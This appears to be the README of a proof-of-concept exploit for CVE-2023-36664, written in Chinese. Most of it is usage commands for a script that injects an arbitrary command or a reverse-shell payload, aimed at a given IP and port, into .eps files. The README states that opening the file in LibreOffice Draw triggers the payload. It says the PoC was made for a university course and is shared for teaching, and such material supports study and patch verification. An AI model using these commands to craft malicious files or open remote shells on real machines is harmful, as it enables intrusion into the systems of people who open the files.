CVE-2023-36664 的概念验证。
将载荷插入 .eps 文件:
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox
将反弹 Shell 载荷插入 .eps 文件:
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
在 Libreoffice Draw 中打开被注入的文件应会触发该载荷。
此概念验证是为大学某特定课程开发的。此处仅出于教学目的发布。